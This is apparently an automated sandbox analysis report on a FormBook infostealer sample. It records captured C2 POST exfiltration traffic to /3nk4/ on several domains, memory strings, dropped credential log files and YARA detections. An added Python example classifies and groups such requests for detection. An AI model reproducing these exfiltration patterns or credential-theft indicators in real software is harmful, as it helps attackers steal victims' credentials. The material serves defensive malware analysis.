66 57 50 37 64 4c 76 64 43 61 37 79 5a 66 51 5a 68 4f 45 34 75 48 64 35 50 7a 39 79 7a 34 4a 36 56 6f 39 4e 4e 52 72 4d 38 30 4e 6e 69 72 74 30 70 39 52 59 65 6a 38 5a 4a 5a 4a 33 33 71 69 44 42 73 68 31 42 61 75 67 68 56 6a 33 33 44 67 28 62 44 4b 42 4a 43 73 4d 38 31 72 66 6f 73 51 77 61 38 6c 67 70 51 78 33 33 53 6d 5a 45 36 50 46 78 52 6e 4a 31 37 30 37 61 4d 47 71 64 56 37 6a 52 69 58 31 56 69 54 75 43 57 79 6a 53 56 35 7a 34 37 42 72 77 7e 36 41 31 34 74 54 49 38 31 6f 62 37 6d 59 41 51 6e 43 71 38 33 7a 49 47 5f 64 49 69 44 41 73 61 39 5a 5a 58 69 4f 34 49 6d 38 44 39 78 45 6e 4f 4d 4b 72 61 64 4b 59 32 56 61 75 72 79 39 53 38 76 7a 5a 77 63 67 62 31 4c 54 53 55 30 64 7a 6a 67 37 54 49 79 45 52 4a 71 47 4b 4b 66 69 52 41 56 6f 43 62 72 62 66 28 63 42 4a 4c 61 6e 37 69 4b 68 39 7e 33 4f 64 72 75 35 45 31 47 35 54 74 32 68 34 41 70 55 65 39 41 36 37 63 41 4c 37 4a 6d 53 67 55 76 56 77 38 7a 38 32 66 43 5a 59 31 48 42 53 76 4d 54 51 70 46 4d 49 62 6e 63 50 38 43 49 4c 75 35 6e 34 71 37 4a 53 65 37 7e 4e 71 5a 58
          Source: global trafficHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.turismoplayas.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.turismoplayas.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.turismoplayas.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 5a 42 64 38 48 7a 50 3d 54 46 4b 66 65 32 6c 6d 45 44 28 64 4e 35 31 36 70 46 50 69 42 69 70 67 49 79 78 51 54 55 7a 66 46 47 68 36 45 45 30 58 34 6d 51 54 46 44 30 71 52 2d 65 6d 59 62 69 4e 33 71 47 4e 30 70 28 7a 36 4c 61 4e 6b 69 74 4d 68 79 79 6b 42 50 69 34 33 48 69 5a 63 75 6c 53 45 66 50 6c 63 2d 62 46 38 31 43 4e 62 59 67 75 55 59 33 76 64 5a 6c 5f 56 6b 73 48 4b 61 65 58 56 53 73 64 70 59 6e 62 79 74 6a 58 6c 34 66 68 35 32 62 6b 63 30 77 5a 49 6b 36 39 39 30 4f 65 66 30 44 43 63 37 5a 72 34 64 70 67 75 6c 70 49 6f 42 77 30 42 5a 65 71 50 52 5a 43 42 6e 43 41 71 51 7a 4f 71 74 63 6c 6c 61 7a 77 75 57 47 66 35 34 49 49 72 70 41 5f 41 49 55 46 47 58 56 72 57 4c 6e 75 75 32 43 4f 38 49 41 39 4e 73 50 41 6e 63 74 36 61 59 34 4c 4d 61 66 2d 61 62 4f 4b 4c 67 39 4e 61 73 6d 39 59 71 59 6b 39 73 64 43 64 78 56 6b 7a 42 34 39 65 64 7e 43 4d 56 61 30 44 69 74 53 75 57 41 56 45 77 44 65 41 71 45 72 58 76 5a 2d 56 59 33 2d 31 30 33 58 31 6b 73 45 63 56 69 5a 46 62 66 71 62 75 72 6c 63 44 31 2d 4d 44 6e 70 6b 48 43 51 51 6e 59 5f 34 6c 73 32 75 50 39 6f 4f 70 6e 76 62 62 75 62 72 55 76 4f 58 4f 39 51 75 31 74 4e 4d 6e 48 54 67 4c 39 37 51 35 6a 71 55 4a 69 79 42 67 56 44 28 5f 61 73 61 79 72 55 63 50 44 36 62 41 29 2e 00 29 2e 00 00 00 00 00 Data Ascii: 
RZBd8HzP=TFKfe2lmED(dN516pFPiBipgIyxQTUzfFGh6EE0X4mQTFD0qR-emYbiN3qGN0p(z6LaNkitMhyykBPi43HiZculSEfPlc-bF81CNbYguUY3vdZl_VksHKaeXVSsdpYnbytjXl4fh52bkc0wZIk6990Oef0DCc7Zr4dpgulpIoBw0BZeqPRZCBnCAqQzOqtcllazwuWGf54IIrpA_AIUFGXVrWLnuu2CO8IA9NsPAnct6aY4LMaf-abOKLg9Nasm9YqYk9sdCdxVkzB49ed~CMVa0DitSuWAVEwDeAqErXvZ-VY3-103X1ksEcViZFbfqburlcD1-MDnpkHCQQnY_4ls2uP9oOpnvbbubrUvOXO9Qu1tNMnHTgL97Q5jqUJiyBgVD(_asayrUcPD6bA).).
          Source: global trafficHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.turismoplayas.comConnection: closeContent-Length: 184586Cache-Control: no-cacheOrigin: http://www.turismoplayas.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.turismoplayas.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 5a 42 64 38 48 7a 50 3d 54 46 4b 66 65 30 46 63 42 7a 37 4d 61 37 68 37 72 52 72 63 46 68 78 79 61 46 34 4f 55 44 48 54 49 78 77 68 45 48 38 54 77 43 55 42 53 51 73 71 58 38 32 74 48 62 69 4f 67 36 47 4d 77 70 7a 4c 35 5a 61 46 6b 6a 70 32 68 79 36 6a 49 6f 53 35 32 58 69 4b 4f 2d 70 45 4d 38 79 35 63 34 62 6b 34 6e 75 56 4f 6f 73 75 4b 34 50 68 41 49 31 61 57 6c 77 59 44 4b 43 4f 59 33 6f 2d 70 49 4b 37 30 4f 66 31 79 4d 66 6a 39 46 48 52 58 55 68 4f 4e 7a 65 4d 7a 45 61 6a 44 6c 58 52 53 34 4e 76 32 35 46 57 68 45 70 50 6d 51 55 75 4b 37 33 58 5a 41 64 52 44 58 66 78 71 58 58 34 74 66 30 30 76 35 48 34 70 6b 79 35 32 74 77 57 6e 36 34 52 4b 71 38 30 45 58 6c 74 4c 61 57 72 6b 47 75 2d 39 4b 70 6d 44 6f 44 37 6c 6f 64 49 4f 61 67 6a 50 4e 47 39 53 36 66 75 4d 6e 4a 61 53 63 47 4c 5a 76 41 53 35 38 64 35 4f 78 56 6a 35 52 34 72 62 38 4b 4a 4d 6c 4b 4a 44 6c 35 41 38 47 73 51 4b 53 48 65 4f 72 30 2d 55 62 46 36 66 4a 48 47 6e 46 79 56 75 6e 78 36 52 31 69 52 46 59 6e 78 62 75 72 70 63 42 63 32 4d 33 50 70 6c 56 4c 55 63 6b 67 7a 36 6c 73 6e 69 5f 74 71 48 2d 48 5f 62 61 47 62 35 57 33 6b 57 5f 6c 51 70 6b 64 4f 4d 46 76 54 69 37 39 37 64 5a 69 57 54 5a 48 58 56 42 49 4b 34 5f 69 59 59 6d 4f 52 50 5f 71 50 48 66 6f 33 57 75 61 41 42 58 75 49 41 2d 4d 77 52 43 72 38 42 57 76 45 52 4f 36 41 31 32 6a 49 71 34 69 41 51 32 31 56 54 37 64 4f 61 34 57 6e 79 54 7a 4d 4e 33 61 74 44 48 39 50 61 52 6a 72 6a 4a 4b 33 63 36 4d 74 4e 79 4f 6f 4a 5a 6a 37 6f 37 51 77 44 48 34 35 4e 61 46 35 46 7a 4e 30 4a 65 64 72 72 62 54 34 6e 65 59 53 
69 63 68 74 76 68 66 33 69 5a 38 6a 77 2d 44 37 54 77 44 2d 57 56 70 49 7e 41 34 4d 47 6c 65 4b 75 36 39 44 57 69 6b 7a 39 6e 4f 6e 34 48 52 7a 71 4d 59 47 70 36 38 74 6e 33 67 61 30 5a 28 66 28 63 78 70 65 37 74 4b 42 38 41 71 6d 6d 46 4e 43 39 59 5f 68 43 75 44 34 63 62 4e 42 44 4c 31 45 36 30 4c 5a 47 67 39 64 54 6f 53 76 75 69 55 61 64 34 2d 6d 46 77 6b 6d 4e 4b 71 36 4d 43 73 7a 62 6b 37 79 6b 5a 61 53 44 78 49 44 42 5a 4a 5a 6f 72 34 45 73 47 47 36 63 6a 51 56 4a 57 69 62 31 49 78 39 67 41 72 57 32 69 38 56 49 45 54 39 78 7e 6d 53 6e 47 62 77 42 35 79 59 41 5a 43 58 49 6b 6a 6c 56 47 6c 65 79 49 66 32 51 46 30 76 61 46 57 6c 52 50 53 64 48 57 51 44 65 28 61 36 6f 35 50 37 74 71 76 57 43 4b 4f 49 75 76 51 66 4c 50 77 62 68 4e 71 42 65 59 57 59 66 31 49 55 4b 35 6a 54 62 6f 7a 71 6d 45 5a 6b 31 56 48 46 5a 70 61 48 4f 39 51 41 72 30 6e 35 31 51 4b 48 31 42 71 70 47 42 33 50 43 5a 59 73 67 68 34 54 55 7a 63 38 50 72 6e 77 67 68 4a 47 79 55 4b 6c 42 28 75 45 75 52 78 68 52 33 68 69 77 62 76 44 62 48 57 76 69 47 34
  Source: unknown | DNS traffic detected: queries for: www.fainlywatchdog.com
          Source: unknownHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.reignsponsibly.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.reignsponsibly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reignsponsibly.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 5a 42 64 38 48 7a 50 3d 34 57 59 2d 38 62 5a 39 58 44 69 67 4b 68 73 54 5a 53 46 47 67 34 28 4e 58 4c 73 5f 72 6f 36 35 74 44 4f 4f 64 36 42 70 59 31 76 39 38 4e 35 59 6c 4c 4f 5f 4a 6c 74 50 65 34 28 43 6f 6a 78 75 4f 59 55 6d 43 65 69 72 45 4f 4b 51 6c 58 4c 44 6e 50 66 52 78 5f 6d 74 59 45 74 7a 70 54 51 32 54 31 4f 4d 63 50 6e 72 6c 33 52 44 69 42 45 79 52 77 69 6e 58 68 4d 4b 32 7a 72 43 68 71 30 4c 63 46 4b 74 31 5f 75 4b 36 68 33 49 74 35 6a 64 47 4b 56 71 51 52 78 4b 39 6c 75 42 78 46 74 31 7a 54 59 33 68 36 4b 6a 5a 55 73 73 64 30 37 43 64 73 31 42 7a 79 6f 55 46 34 5a 38 48 50 79 56 6a 49 4e 35 75 43 65 78 54 48 66 6c 44 2d 6d 56 7a 47 28 59 32 64 36 75 31 41 5a 65 4d 64 6a 64 68 41 37 58 32 57 6a 51 7a 4c 4f 35 64 48 69 52 62 35 39 51 49 4c 71 6e 5a 57 79 75 35 4d 72 39 77 57 6c 49 35 4e 38 6a 58 66 47 58 42 69 53 70 4d 65 64 51 42 4a 6d 4c 74 30 58 67 5a 39 35 79 6b 4f 47 71 65 59 52 77 63 4f 57 79 6a 39 59 6e 64 35 57 4f 49 6e 7e 69 4c 47 75 49 31 4a 6a 32 38 5a 62 39 49 43 35 41 69 57 37 5f 46 75 7a 59 6f 4b 65 38 73 36 54 33 69 36 64 58 57 4b 57 4c 79 73 64 53 57 39 41 78 39 64 7a 76 63 46 59 54 51 75 4a 50 4c 5f 62 44 47 58 30 79 4b 6c 49 61 62 4c 5a 65 77 50 4e 69 4b 31 36 5f 31 4c 39 31 55 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
RZBd8HzP=4WY-8bZ9XDigKhsTZSFGg4(NXLs_ro65tDOOd6BpY1v98N5YlLO_JltPe4(CojxuOYUmCeirEOKQlXLDnPfRx_mtYEtzpTQ2T1OMcPnrl3RDiBEyRwinXhMK2zrChq0LcFKt1_uK6h3It5jdGKVqQRxK9luBxFt1zTY3h6KjZUssd07Cds1BzyoUF4Z8HPyVjIN5uCexTHflD-mVzG(Y2d6u1AZeMdjdhA7X2WjQzLO5dHiRb59QILqnZWyu5Mr9wWlI5N8jXfGXBiSpMedQBJmLt0XgZ95ykOGqeYRwcOWyj9Ynd5WOIn~iLGuI1Jj28Zb9IC5AiW7_FuzYoKe8s6T3i6dXWKWLysdSW9Ax9dzvcFYTQuJPL_bDGX0yKlIabLZewPNiK16_1L91Ug).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Sep 2020 10:08:49 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 6b 34 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nk4/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
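The traffic above has the shape a responder can key on even without a configuration extraction (the report found none): a short path token (/3nk4/) reused across several unrelated domains, header-less GET beacons with two query parameters whose second value (2dqLWV=hpyPnldh-tYHIZfP) is identical on every host, and POSTs to the same path with an Internet Explorer 11 User-Agent and Origin/Referer pointing back at the contacted host, one small (Content-Length 414) and one large (184586). The 403 and 404 responses fit the well-known FormBook habit of cycling through a list of mostly dead or decoy domains before reaching a live panel. The following is an added example, not part of the Joe Sandbox report: it parses constructed request header blocks copied from the captures above (bodies omitted, trailing NUL bytes dropped, plus one constructed benign request), classifies them with the heuristics just described, and pivots the hits by path token so the three domains fall into one cluster. The path regex, the exact header checks and the label names are assumptions for this example.

```python
"""Heuristic classification and pivoting of FormBook-style C2 HTTP requests.

Added example; the heuristics are derived from the requests captured in this
report and are not a FormBook config extractor.
"""
import re

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
# Short alphanumeric path token with surrounding slashes, e.g. /3nk4/ (assumed bound of 2-8 chars).
C2_PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")

# Constructed from the requests captured above: header blocks only, POST bodies omitted,
# trailing NUL bytes of the GET requests dropped. The last request is a benign control.
SAMPLE_REQUESTS = [
    "GET /3nk4/?RZBd8HzP=bIh+1viU3kJZwlU1+bF7NiTuEsJvwz9W2axQZvl/sJKd/5qF7f1dSILuagTiNZjEdxJz&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1\r\n"
    "Host: www.trulex.xyz\r\nConnection: close\r\n\r\n",
    "GET /3nk4/?RZBd8HzP=w0UEi+V/ezucUh8SDyYF/+zgRqcIqbOC7nP1ZKE/fBP38eRJlYPULz8xC7zNwysHBq0j&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1\r\n"
    "Host: www.reignsponsibly.com\r\nConnection: close\r\n\r\n",
    "GET /3nk4/?RZBd8HzP=bnGlARlxAxXJaK863FaqbUduOQZZdXfDbBghBWs+/ncmCRg0ePvqNMTvjJHXk6PE1an+&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1\r\n"
    "Host: www.turismoplayas.com\r\nConnection: close\r\n\r\n",
    "POST /3nk4/ HTTP/1.1\r\nHost: www.reignsponsibly.com\r\nConnection: close\r\nContent-Length: 414\r\n"
    "Cache-Control: no-cache\r\nOrigin: http://www.reignsponsibly.com\r\n"
    f"User-Agent: {IE11_UA}\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
    "Referer: http://www.reignsponsibly.com/3nk4/\r\nAccept-Language: en-US\r\nAccept-Encoding: gzip, deflate\r\n\r\n",
    "POST /3nk4/ HTTP/1.1\r\nHost: www.turismoplayas.com\r\nConnection: close\r\nContent-Length: 184586\r\n"
    "Cache-Control: no-cache\r\nOrigin: http://www.turismoplayas.com\r\n"
    f"User-Agent: {IE11_UA}\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
    "Referer: http://www.turismoplayas.com/3nk4/\r\nAccept-Language: en-US\r\nAccept-Encoding: gzip, deflate\r\n\r\n",
    # Benign control (constructed).
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: curl/7.68.0\r\nConnection: close\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query parameters, headers and body.

    The query string is split by hand rather than with urllib so that '+' and '/'
    inside the first parameter (FormBook's custom base64 alphabet) are kept verbatim.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    params = [tuple(kv.split("=", 1)) if "=" in kv else (kv, "") for kv in query.split("&") if kv]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "params": params, "headers": headers, "body": body}


def classify(req):
    """Return a label for FormBook-like requests, or None."""
    h = req["headers"]
    host = h.get("host", "")
    if not C2_PATH_RE.match(req["path"]):
        return None
    if req["method"] == "GET":
        # Two query parameters, nothing but Host and Connection: close, no User-Agent.
        if len(req["params"]) == 2 and "user-agent" not in h \
                and h.get("connection") == "close" and set(h) <= {"host", "connection"}:
            return "formbook_get_beacon"
    elif req["method"] == "POST":
        same_site = h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{req['path']}"
        if same_site and h.get("user-agent") == IE11_UA \
                and h.get("content-type") == "application/x-www-form-urlencoded":
            return "formbook_post_exfil"
    return None


def pivot(raw_requests):
    """Group hits by C2 path token; collect contacted hosts, labels and the second GET parameter."""
    groups = {}
    for raw in raw_requests:
        req = parse_request(raw)
        label = classify(req)
        if label is None:
            continue
        g = groups.setdefault(req["path"], {"hosts": set(), "labels": set(), "second_param": set()})
        g["hosts"].add(req["headers"].get("host"))
        g["labels"].add(label)
        if req["method"] == "GET":
            g["second_param"].add("=".join(req["params"][1]))
    return groups


if __name__ == "__main__":
    for path, g in pivot(SAMPLE_REQUESTS).items():
        print(path, sorted(g["hosts"]), sorted(g["labels"]), sorted(g["second_param"]))
```

Run on the constructed set, every request to /3nk4/ is labelled and the benign one is not; the three hosts collapse into a single cluster keyed by the path token, with the constant second parameter as the second pivot value. In practice the same grouping over proxy logs separates the one domain that answered with something other than 403/404 (the live panel) from the decoys, which is what the blocklist should be built from.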
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: svchost.exe, 00000003.00000002.467866629.00000000036A9000.00000004.00000001.sdmpString found in binary or memory: http://www.turismoplayas.com
          Source: svchost.exe, 00000003.00000002.467866629.00000000036A9000.00000004.00000001.sdmpString found in binary or memory: http://www.turismoplayas.com/3nk4/
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: svchost.exe, 00000003.00000002.464179041.0000000000419000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: svchost.exe, 00000003.00000002.464277981.0000000000436000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: svchost.exe, 00000003.00000002.464179041.0000000000419000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
          Source: svchost.exe, 00000003.00000002.464277981.0000000000436000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2;
          Source: svchost.exe, 00000003.00000002.465432256.0000000002A38000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
          Source: svchost.exe, 00000003.00000002.464179041.0000000000419000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: svchost.exe, 00000003.00000002.464179041.0000000000419000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: svchost.exe, 00000003.00000002.464179041.0000000000419000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: svchost.exe, 00000003.00000003.373140432.0000000005A00000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_004308B4 GetKeyboardState,0_2_004308B4

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.432596553.0000000004290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.465450197.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.443381775.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.444527308.0000000003050000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.198128897.00000000021D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.442039105.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.441710972.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.197591617.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.199282148.0000000004180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.227981004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.229698791.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.464383843.0000000000600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.233460768.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.432464043.00000000028D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.28d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.1.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.4180000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.4290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.28d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.4180000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.1.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.4290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K4A5-D33\K4Alogri.ini
          Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K4A5-D33\K4Alogrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.432596553.0000000004290000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.432596553.0000000004290000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.465450197.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.465450197.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
